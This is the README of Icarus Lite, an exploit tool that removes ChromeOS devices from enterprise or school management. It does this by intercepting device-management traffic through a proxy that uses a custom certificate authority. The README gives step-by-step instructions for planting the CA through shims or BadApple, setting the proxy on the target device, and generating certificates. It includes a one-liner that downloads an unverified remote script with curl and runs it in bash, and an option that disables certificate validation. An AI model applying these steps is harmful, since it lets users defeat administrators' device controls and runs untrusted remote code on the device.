Icarus Lite is a lightweight and easy-to-use version of the ChromeOS unenrollment exploit known as Icarus, which unenrolls devices with device management interception using a proxy and a custom Certificate Authority.

Icarus Lite is based off the original Icarus code and works in the same way. Although the original Icarus is currently archived and no longer recieving support, Icarus Lite will be supported and updated.

Using the Windows pre-compiled .exe version of Icarus Lite, you will not need to worry about dependencies as they are packaged with the .exe. Icarus Lite uses:

• protobuf
• requests
• PyOpenSSL
• cryptography

As shown in Setup Instructions, these packages can be installed simultaneously by utilizing requirements.txt.

If you are on Windows, you can download a pre-compiled .exe version of Icarus Lite in the "Releases" section of this repository. Alternatively, you can follow the Linux/Mac instructions below to manually run Icarus Lite on your machine.

If you are on Linux or Mac (or wish to run Icarus Lite from its source directly on Windows), the below instructions will cover how to run Icarus Lite.

1. Open a Command Prompt/Terminal window and run python --version and/or python3 --version. If the command is not found, install Python from python.org (or wherever/however is best for your OS/distro). Once Python has been installed, close and re-open a new terminal.
2. Run git --version. If the command is not found, install Git from git-scm.com (or wherever/however is best for your OS/distro). Once Git has been installed, close and re-open a new terminal.
3. In whichever directory you want to copy Icarus Lite into, run git clone https://github.com/cosmicdevv/Icarus-Lite.git, then run cd Icarus-Lite.
4. Install all Python package dependencies, which can be done by running pip install -r requirements.txt/pip3 install -r requirements.txt. On some Linux distros (specifically in managed environments), pip may not work correctly, in which case you may need to use sudo apt install python3-protobuf python3-requests python3-openssl python3-cryptography.
5. Run python main.py and/or python3 main.py.
6. Icarus Lite will attempt to automatically set up the required file structure and download the latest SSL certificates from kxtz's Icarus fork.

Once Icarus Lite is running, usage is extremely simple. Icarus Lite will attempt to automatically fetch your local IP when the Proxy Server starts, and will provide you with an IP and port to use. The target ChromeOS device should be on the SAME WiFi network as the device hosting the Icarus Lite server. Using Icarus Lite on the target ChromeOS device is the same process as using normal Icarus assuming CA (Certificate Authority) has already been loaded onto the target device. The process of which you use to load the CA (Certificate Authority) onto the target device will depend on whether or not the target device is keyrolled.

On a Non-Keyrolled ChromeOS device, modified shims can be used to modify the device's Stateful Parition and load the CA (Certificate Authority) onto the device. To do this, an Icarus shim must be ran on the ChromeOS device (see sh1mmer.me > Executing on Chromebook).

Using Icarus Lite on the target ChromeOS device requires utilization of BadApple Icarus to load the CA (Certificate Authority) onto the device. To do this, the BadApple Icarus script must be ran on the ChromeOS device.

A modified version of BadApple Icarus (Icarus-Lite-BadApple) is recommended for usage, which simplifies the usage process. Follow the instructions here up until Step 5. Once you are connected to WiFi and in a BadApple shell, run:

bash <(curl -SLk http://ba.cosmion.xyz/script)

If Icarus-Lite-BadApple does not work for you, try using normal BadApple Icarus

Once an Icarus shim/script has been used, using Icarus Lite on the target ChromeOS device is the same process as using normal Icarus. The target ChromeOS device should be on the SAME WiFi network as the device hosting the Icarus Lite server.

1. After rebooting into ChromeOS verified mode following using an Icarus shim, do not click "continue". Instead, manually open the Network Configuration by clicking on the bottom-right icons which contain the time, WiFi, and Battery status. Once in Network Configuration, connect to your WiFi and enter the proxy settings.
2. Set "Connection Type" to Manual
3. Set the "Secure HTTP" IP address to the IP Icarus Lite gives you
4. Set the "Secure HTTP" port to the port Icarus Lite gives you
5. Click "Save"
6. Resume the ChromeOS setup process as normal and Icarus Lite should unenroll you.

Icarus Lite only replaces the server functionality of Icarus, but for Icarus to successfully unenroll a ChromeOS device, that device still must have had Icarus's custom CA (Certificate Authority) loaded onto it. The method to which said CA Is loaded onto the device depends on whether or not the device is keyrolled. For non-keyrolled devices, users must use a shim file flashed to a USB drive to modify the devices Stateful Partition.

Icarus Lite does not currently have the functionality to build shims, so users must either use prebuilt shims or build their own shims from Icarus's original source. Instructions on building shims, along with a maintained fork of Icarus, can be found here.

For prebuilt shims, it is recommended to download them from the below servers:

• kxtz's download server
• fanqyxl's download server

In order for the client (target ChromeOS device) to establish a proper connection to the MiniSever, we need an SSL certificate to establish the secure tunnel. If the SSL certificate is invalid, the target device will reject the connection (which in most cases will bring you to a "Cannot reach Google" screen). Icarus uses a custom CA (Certificate Authority) which isn't trusted to external devices, which also means any SSL certificates generated from our custom CA will also not be trusted to external devices. This causes most devices (including any ChromeOS devices) to reject the connection because of the untrusted CA.

This is why a user must run an Icarus shim on a ChromeOS device prior to using the Icarus Lite server for unenrollment; in the simplest terms, the shim makes the device trust the CA so that way the device won't refuse the connection to the MiniServer.

When a shim has been built using a different CA than the SSL certificates, the target device will still reject the connection. This is why if constantly getting a "Can't reach Google" screen, users should consider building their own shim and SSL certificates.

Icarus Lite has the ability to automatically generate SSL certificates with a provided CA (Certificate Authority). The process is relatively simple:

1. Generate your CA (you must have a key and pem) or use an existing CA.
2. Put your CA (key and pem) into IcarusLite/manualcerts with the names myCA.pem and myCA.key.
3. In IcarusLite/manualcerts, create two empty files named google.com.pem and google.com.key.
4. Run Icarus Lite and when prompted to select certificate options, select option 1 (Use manual certificates).
5. Icarus Lite will attempt to check the validity of the certificates, and will ask you if you want to generate new certificates.
6. Select yes and wait for the SSL certificates to be generated.

Upon first setup, Icarus Lite will automatically create and set a config.json file which will store certain configuration options designed for debugging Icarus Lite. The file can be directly edited to store true or false values for each configuration option, and the config will be loaded the next time Icarus Lite starts.

Configuration can be ignored by most users and is designed for enhanced server hosting if you plan to host your own server to use Icarus Lite on a larger number of devices.

• bypassCA: This option, if set to true, will bypass Icarus Lite requiring a CA in addition to SSL certificates. It will also disable SSL certificate validation.
• autoUpdate: This option, if set to true, will automatically update Icarus Lite when an update is detected and bypass asking the user yes or no.
• autoCertificateMode: This option, if set to 1 or 2, will automatically select the certificate mode and bypass asking the user for a selection. Its default value is 0, where it will not affect anything.
• disableDelays: This option, if set to true, will disable the 5-second delays between intialization sections of Icarus Lite.

Create a GitHub Issue on this repository for support and/or to report any issues with Icarus Lite. Support will NOT be offered for the following:

• Original Icarus
• BadApple Icarus (for support on BadApple Icarus, please create an issue here)
• Public Icarus Lite servers

This section contains planned updates to Icarus Lite to improve functionality.

• Shim building implementation
• fix miniservers idk why we need multiple miniservers ill change that sometime

• cosmicdevv - Writing and maintaining Icarus Lite
• kxtzownsu - Maintaining the Certificate Authority Icarus Lite uses
• appleflyerv3 - Maintaining BadApple Icarus for keyrolled devices
• Fanqyxl - Emotional support + keyrolling his chromebook lol
• MunyDev - Discovering and creating original Icarus